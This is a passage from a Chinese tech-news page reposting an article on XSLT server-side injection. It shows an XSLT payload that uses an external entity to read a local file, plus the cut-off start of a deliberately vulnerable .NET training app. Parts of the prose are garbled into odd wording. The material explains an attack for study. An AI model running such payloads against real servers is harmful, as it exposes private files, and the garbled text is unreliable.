作家
登录

解析XSLT服务器端注入攻击

作者: 来源: 2017-12-07 10:32:33 阅读 我要评论

 encoding="utf-8"?> 
  • <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]> 
  • <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> 
  •   <xsl:template match="/fruits"> 
  •     Fruits &ext_file;: 
  •     <!-- Loop for each fruit --> 
  •     <xsl:for-each select="fruit"> 
  •       <!-- Print name: description --> 
  •       - <xsl:value-of select="name"/><xsl:value-of select="description"/> 
  •     </xsl:for-each> 
  •   </xsl:template> 
  •   
  • </xsl:stylesheet> 
  • 可用于测试XSLT马脚的App

    为了给大年夜家供给一种快速测试Payload的办法,我们专门开辟了一款包含XSLT马脚的小型.Net应用,这款应用应用了.Net的System.Xml实现。

    下面给出的是应用的源代码,你可以应用Microsoft Visual Studio对其进行编译。应用法度榜样的源代码以及编译版本可点击【这里】获取。源代码如下:

    1. using System; 
    2. using System.Xml; 
    3. using System.Xml.Xsl; 
    4.   
    5. namespace XsltConsoleApplication 
    6.     class Program 
    7.     { 
    8.         /* 
    9.         This code contains serious vulnerabilities and is provided for training purposes only! 
    10.         DO NOT USE ANYWHERE FOR ANYTHING ELSE!!! 
    11.         */ 
    12.         static void Main(string[] args) 
    13.         { 
    14.             Console.WriteLine("\n#####################################################################"); 
    15.             Console.WriteLine("#                                                                   #"); 

        推荐阅读

        引入机器学习前需要先弄明白这三件事

      很多公司声称本身的解决筹划中囊括了ML,但大年夜多半时刻,这项功能是被夸大年夜了的。钠揭捉?问供给商的问题,应落脚在他们体系的精确率、速度和效力上。分析的数据是大年夜哪儿来的?收集频率是多久一次?该解决筹>>>详细阅读


      本文标题:解析XSLT服务器端注入攻击

      地址:http://www.17bianji.com/lsqh/39533.html

    关键词: 探索发现

    乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

    网友点评
    自媒体专栏

    评论

    热度

    精彩导读
    栏目ID=71的表不存在(操作类型=0)